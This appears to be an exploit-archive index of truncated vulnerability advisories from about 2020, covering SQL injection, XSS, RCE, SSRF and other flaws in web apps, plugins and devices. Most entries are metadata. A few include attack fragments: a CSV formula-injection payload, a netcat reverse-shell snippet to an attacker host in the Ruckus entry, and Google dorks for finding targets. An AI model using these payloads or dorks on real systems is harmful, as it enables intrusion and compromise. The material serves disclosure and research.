Student Result Management System 1.0 SQL Injection

Exploit Title: Student Result Management System 1.0 - Authentication Bypass SQL Injection Google Dork: N/A Date: 11/16/2020 Exploit Author: Ritesh Gohil Vendor Homepage: https://projectnotes.org/it-projects/student-result-management-system-in-php-with-source-code/ Software Link:...

Online News Portal System 1.0 Cross Site Scripting

Exploit Title: Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting Date: 24-11-2020 Exploit Author: Parshwa Bhavsar Vendor Homepage: https://www.sourcecodester.com/php/14600/online-news-portal-using-phpmysqli-source-code.html Software Link:...

WordPress WP-FileManager 6.8 Remote Code Execution

Exploit Title: WordPress Plugin Wp-FileManager 6.8 - RCE Date: September 4,2020 Exploit Author: Mansoor R @time4ster Version Affected: 6.0 to 6.8 Vendor URL: https://wordpress.org/plugins/wp-file-manager/ Patch: Upgrade to wp-file-manager 6.9 Tested on: wp-file-manager 6.0...

WonderCMS 3.1.3 Remote Code Execution

Exploit Title: WonderCMS 3.1.3 - Authenticated Remote Code Execution Date: 2020-11-27 Exploit Author: zetc0de Vendor Homepage: https://www.wondercms.com/ Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip Version: 3.1.3 Tested on: Ubuntu 16.04 CVE : N/A...

EgavilanMedia User Registration And Login System With Admin Panel 1.0 XSS

Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting Exploit Author: Soushikta Chowdhury Vendor Homepage: http://egavilanmedia.com Software Link: http://egavilanmedia.com/user-registration-and-login-system-with-admin-panel/ Version: 1.0...

Bakeshop Online Ordering System 1.0 Cross Site Scripting

Exploit Title: Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting Date: 26-11-2020 Exploit Author: Parshwa Bhavsar Vendor Homepage: https://www.sourcecodester.com/ Software Link:...

ChurchCRM 4.2.0 CSV Injection

Exploit Title: ChurchCRM 4.2.1- CSV/Formula Injection Date: 2020- 10- 24 Exploit Author: Mufaddal Masalawala Vendor Homepage: https://churchcrm.io/ Software Link: https://github.com/ChurchCRM/CRM Version: 4.2.0 Payload: =10+20+cmd|' /C calc'!A0 Tested on: Kali Linux 2020.3 Proof Of Concept: CSV...

Ksix Zigbee Devices Playback Protection Bypass

Exploit Title: Ksix Zigbee Devices - Playback Protection Bypass PoC Date: 2020-11-15 Exploit Author: Alejandro Vazquez Vazquez Vendor Homepage: https://www.ksixmobile.com/ Firmware Version: Gateway Zigbee Module - v1.0.3, Gateway Main Module - v1.1.2, Door Sensor - v1.0.7, PIR Motion Sensor -...

Expanse Management System Cross Site Scripting

Exploit Title: Expense Management System - 'description' Stored Cross Site Scripting Date: 02/12/2020 Exploit Author: Nikhil Kumar Vendor Homepage: http://egavilanmedia.com/ Software Link: http://egavilanmedia.com/expense-management-system/ Tested On: Ubuntu Vunerable Parameter: "description="...

IDT PC Audio 1.0.6433.0 Unquoted Service Path

Exploit Title: IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path Discovery by: Manuel Alvarez Software link: https://www.pconlife.com/download/otherfile/20566/e82994866a370a480607637f28b82835/ Discovery Date: 2020-11-27 Tested Version: 1.0.6433.0 Vulnerability Type: Unquoted Service Path...

aSc TimeTables 2021.6.2 Denial Of Service

Exploit Title: aSc TimeTables 2021.6.2 - Denial of Service PoC Date: 2020-01-12 Exploit Author: Ismael Nava Vendor Homepage: https://www.asctimetables.com/!/home Software Link: https://www.asctimetables.com/!/home/download Version: 2021.6.2 Tested on: Windows 10 Home x64 STEPS Open the program aS...

Simple College Website 1.0 Local File Inclusion

Exploit Title: Simple College Website 1.0 - 'page' Local File Inclusion Date: 30-10-2020 Exploit Author: mosaaed Vendor Homepage: https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html Software Link:...

PRTG Network Monitor 20.4.63.1412 Cross Site Scripting

Exploit Title: PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS Date: 2/12/2020 Exploit Author: Amin Rawah Vendor Homepage: https://www.paessler.com/prtg Software Link: https://www.paessler.com/prtg Version: 20.4.63.1412 x64 Tested on: Windows CVE : CVE-2020-14073 Description: Since there is...

WonderCMS 3.1.3 Code Execution / Server-Side Request Forgery

Exploit Title: WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution Date: 2020-11-27 Exploit Author: zetc0de Vendor Homepage: https://www.wondercms.com/ Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip Version: 3.1.3 Tested on: Ubuntu...

Car Rental Management System 1.0 Local File Inclusion / SQL Injection

Exploit Title: Car Rental Management System 1.0 - SQL Injection / Local File include Date: 22-10-2020 Exploit Author: Mosaaed Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html Software Link:...

Online Voting System Project In PHP Cross Site Scripting

Exploit Title: Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting Date: 27-11-2020 Exploit Author: Sagar Banwa Vendor Homepage: https://projectworlds.in/ Software Link: https://projectworlds.in/free-projects/php-projects/online-voting-system-project-in-php-2/ Tested...

ILIAS Learning Management System 4.3 Server-Side Request Forgery

Exploit Title: ILIAS Learning Management System 4.3 - SSRF Date: 10-08-2020 Exploit Author: Dot/kx1z0 Vendor Homepage: https://www.ilias.de/ Software Link: https://github.com/ILIAS-eLearning/ILIAS/tree/release4-3 Version: 4.3-5.1 Tested on: Linux Description We can create portfolios, export them ...

Pharmacy Store Management System 1.0 SQL Injection

Exploit Title: Pharmacy Store Management System 1.0 - 'id' SQL Injection Google Dork: N/A Date: 1.12.2020 Exploit Author: Aydın Baran Ertemir Vendor Homepage: https://www.sourcecodester.com/php/13225/pharmacy-store-management-system.html Software Link:...

Mitel CS018 Information Disclosure

Exploit Title: Mitel mitel-cs018 - Call Data Information Disclosure Date: 2003-07-28 Exploit Author: Andrea Intilangelo acme olografix / paranoici Vendor Homepage: www.mitel.com Version: mitel-cs018 Tested on: Windows, Linux There is an interesting bug in a Mitel's servers for Voice over IP that...

ChurchCRM 4.2.1 Cross Site Scripting

Exploit Title: ChurchCRM 4.2.1- Persistent Cross Site ScriptingXSS Date: 2020- 10- 29 Exploit Author: Mufaddal Masalawala Vendor Homepage: https://churchcrm.io/ Software Link: https://github.com/ChurchCRM/CRM Version: 4.2.1 Tested on: Kali Linux 2020.3 Proof Of Concept: ChurchCRM application allo...

EgavilanMedia User Registration And Login System With Admin Panel 1.0 CSRF

Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF Date: 01-12-2020 Exploit Author: Hardik Solanki Vendor Homepage: http://egavilanmedia.com Software Link:...

WebDamn User Registration And Login System With User Panel SQL Injection

Exploit Title: WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass Date: 18-11-2020 Exploit Author: Aakash Madaan Vendor Homepage: https://webdamn.com/ Software Link : https://webdamn.com/user-management-system-with-php-mysql/ Version: N/A Default Tested on: Windows 10...

NewsLister Cross Site Scripting

Exploit Title: NewsLister - Authenticated Persistent Cross-Site Scripting Date: 2020-11-27 Exploit Author: Emre Aslan Vendor Homepage: https://www.netartmedia.net/newslister.html Tested on: Windows & XAMPP == PoC HTTP Request == GET /admin/index.php?page=add HTTP/1.1 Host: 127.0.0.1:8080...

DotCMS 20.11 Cross Site Scripting

Exploit Title: DotCMS 20.11 - Stored Cross-Site Scripting Exploit Author: Hardik Solanki Vendor Homepage: https://dotcms.com/ Version: 20.11 Tested on Windows 10 Vulnerable Parameters: Template Title Steps to reproduce: 1. Login With Admin Username and password. 2. Navigate to Site -- Template --...

Local Service Search Engine Management System 1.0 SQL Injection

Exploit Title: Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass Date: 21/11/2020 Exploit Author: Aditya Wakhlu Vendor Homepage: https://www.sourcecodester.com/php/14607/local-service-search-engine-management-system-using-phpmysqli-source-code.html Software Link:...

Under Construction Page With CPanel 1.0 SQL Injection

Exploit Title: Under Construction Page with CPanel 1.0 - SQL injection Date: 17-11-2020 Exploit Author: Mayur Parmarth3cyb3rc0p Vendor Homepage: http://egavilanmedia.com Software Link : http://egavilanmedia.com/under-construction-page-with-cpanel/ Version: 1.0 Tested on: PopOS SQL Injection: SQL...

SciKit-Learn 0.23.2 Denial Of Service

Description svmpredictvalues in svm.cpp in Libsvm v324, as used in scikit-learn 0.23.2 and other products, allows attackers to cause a denial of service segmentation fault via a crafted model SVM introduced via pickle, json, or any other model permanence technique with a large value in the nsuppo...

TypeSetter 5.1 Cross Site Request Forgery

Exploit Title: TypeSetter 5.1 - CSRF Change admin e-mail Exploit Author: Alperen Ergel Software Homepage: https://www.typesettercms.com/ Version : 5.1 Tested on: Kali & ubuntu Category: WebApp Description Attacker can change admin e-mail address Vulnerable - Go to the admin page view preferences ...

WordPress EventON Calendar 3.0.5 Cross Site Scripting

Exploit Title: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting Date: 27.11.2020 Exploit Author: b3kc4t Mustafa GUNDOGDU Vendor Homepage: https://www.myeventon.com/ Version: 3.0.5 Tested on: Ubuntu 18.04 CVE : 2020-29395 Description Link:...

eClass LMS 2.6 Shell Upload

...

WordPress Heroic Knowledge Base 3.0.1 SQL Injection

Exploit Title : wordpress Heroic Knowledge Base Plugin = 3.0.1 - sql injection Exploit Author : begininvoke Exploit Date : 2020-11-29 Vendor Homepage : https://herothemes.com + Proof Of Concept: ===================== Parameters id is vulnerable Methode POST POST /wp-admin/admin-ajax.php HTTP/1.1...

Intelbras Router RF 301K 1.1.2 Authentication Bypass

Exploit Title: Intelbras Router RF 301K 1.1.2 - Authentication Bypass Date: 27/11/2020 Exploit Author: Kaio Amaral Vendor Homepage: https://www.intelbras.com/pt-br/ Software Link: http://backend.intelbras.com/sites/default/files/2020-10/RF301Kv1.1.2.zip Version: firmware version 1.1.2 Tested on:...

ATX MiniCMTS200a Broadband Gateway 2.0 Credential Disclosure

Exploit Title: ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure Date: 2020-11-20 Exploit Author: Zagros Bingol Vendor Homepage: http://www.atx.com Software Link: https://atx.com/products/commercial-services-gateways/minicmts200a-broadband-gateway/ Version: 2.0 and earlier Tested on:...

Online Job Portal In PHP/PDO 1.0 SQL Injection

Title: online job portal phppdo v1.0 - SQL injection Exploit Author: Mohamed Elobeid 0b3!d Date: 2020-08-21 Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html Software Link:...

YATinyWinFTP Denial Of Service

Exploit Title: YATinyWinFTP - Denial of Service PoC Google Dork: None Date: 20.08.2020 Exploit Author: strider Vendor Homepage: https://github.com/ik80/YATinyWinFTP Software Link: https://github.com/ik80/YATinyWinFTP Tested on: Windows 10...

Rejetto HttpFileServer 2.3.x Remote Command Execution

Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution 3 Google Dork: intext:"httpfileserver 2.3" Date: 28-11-2020 Remote: Yes Exploit Author: Óscar Andreu Vendor Homepage: http://rejetto.com/ Software Link: http://sourceforge.net/projects/hfs/ Version: 2.3.x Tested on: Windows...

Apache NiFi API Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Potential Improvements: Add option to authenticate using client certificate Add a scanner module? class MetasploitModule 'Apache NiFi API Remote Code Execution',...

ElkarBackup 1.3.3 Cross Site Scripting

Exploit Title: ElkarBackup 1.3.3 - 'Policyname' and 'PolicyDescription' Stored Cross-site Scripting Date: 2020-08-22 Exploit Author: Vyshnav NK Vendor Homepage: https://www.elkarbackup.org/ Software Link: https://github.com/elkarbackup/elkarbackup/wiki/Installation Version: 1.3.3 Tested on: Linux...

Laravel Administrator 4 File Upload

Exploit title: Laravel Administrator 4 - Unrestricted File Upload Authenticated Author: Victor Campos and Xavi Beltran Contact: [email protected] Exploit Development: https://xavibel.com/2020/03/23/unrestricted-file-upload-in-frozennode-laravel-administrator/ Date: 25/3/2020 Software link:...

WordPress Accesspress Social Icons Theme 1.7.9 SQL Injection

Exploit Title: Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection Authenticated Exploit Author: SunCSR Sun Cyber Security Research - Nguyen Khang Google Dork: N/A Date: 2020-08-24 Vendor Homepage: https://accesspressthemes.com Software Link:...

Best Support System 3.0.4 Cross Site Scripting

Exploit Title: Best Support System 3.0.4 - 'ticketbody' Persistent XSS Authenticated Google Dork: "Powered By Best Support System" Date: 2020-08-23 Exploit Author: Ex.Mi https://ex-mi.ru Vendor: Appsbd https://appsbd.com Software Version: 3.0.4 Software Link:...

SAP Lumira 1.31 Cross Site Scripting

Exploit Title: SAP Lumira 1.31 - Stored Cross-Site Scripting Date: 13.08.2020 Exploit Author: Ilca Lucian Florin Vendor Homepage: https://www.sap.com Software Link: SAP Lumira Version: 123 •...

WordPress Wibar Theme 1.1.8 Cross Site Scripting

Exploit Title: Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting Date: 11/27/2020 Exploit Author: Ilca Lucian Florin Vendor Homepage: http://demo.themeftc.com/wibar Software Link: https://themeforest.net/item/wibar-responsive-woocommerce-wordpress-theme/20994798 Version:...

WordPress Age Gate 2.13.4 Open Redirect

Exploit Title: URL Redirection to Untrusted Site 'Open Redirect' Age Gate Wordpress Plugin = 2.13.4 Date: 11/27/2020 Exploit Author: Ilca Lucian Florin Vendor Homepage: https://agegate.io/ Software Link: https://wordpress.org/plugins/age-gate/ Version: = 2.13.4 Tested on: Latest Version of Deskto...

Moodle 3.8 Arbitary File Upload

Exploit Title: Moodle 3.8 - Unrestricted File Upload Date: 2019-09-08 Exploit Author: Sirwan Veisi Vendor Homepage: https://moodle.org/ Software Link: https://github.com/moodle/moodle Version: Moodle Versions 3.8, 3.7, 3.6, 3.5, 3.4... Tested on: Moodle Version 3.8 CWE : CWE-434 I found an...

Ruckus IoT Controller 1.5.1.0.21 Remote Code Execution

Product: Ruckus IoT Controller Ruckus vRIoT Version: &1|nc "+lhost+" "+lport+" /tmp/f; " return payload def generateMagicToken: encdecmethod = 'utf-8' salt = 'nplusServiceAuth' salt = salt.encode"utf8" strkey = 'serviceN1authent' strtoenc = 'TlBMVVMx' return encryptencdecmethod, salt, strkey,...

ZTE Blade Vantage Z839 Emode.APK android.uid.system Privilege Escalation

ZTE Blade Vantage Z839 Emode.APK android.uid.system LPE exploit =============================================================== ZTE Blade Vantage Z839 Android handsets running 7.1.1 contain an engineering mode that utilizes "Android Secret Codes" for accessing hidden engineering functionality. Su...

Heroic Knowledge Base 3.0.1 Cross Site Scripting

Exploit Title : Heroic Knowledge Base Plugin Methode POST POST /wp-admin/admin-ajax.php HTTP/1.1 Host: site.com User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10.15; rv:56.0 Gecko/20100101 Firefox/56.0 Waterfox/56.3 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate...

WonderCMS 3.1.3 Cross Site Scripting

Exploit Title: WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting Google Dork: "WonderCMS" Date: 2020-11-27 Exploit Author: SunCSR Sun Cyber Security Research Vendor Homepage: https://www.wondercms.com/ Software Link:...

BigBlueButton 2.2.29 E-mail Validation Bypass

Title: BigBlueButton E-mail Validation Bypass Google Dork: N/A Date: 24.11.2020 Author: Seccops https://seccops.com Vendor Homepage: bigbluebutton.org Version: 2.2.29 and previous versions CVE: CVE-2020-29043 === Summary === An issue was discovered in BigBlueButton through 2.2.29. When at attacke...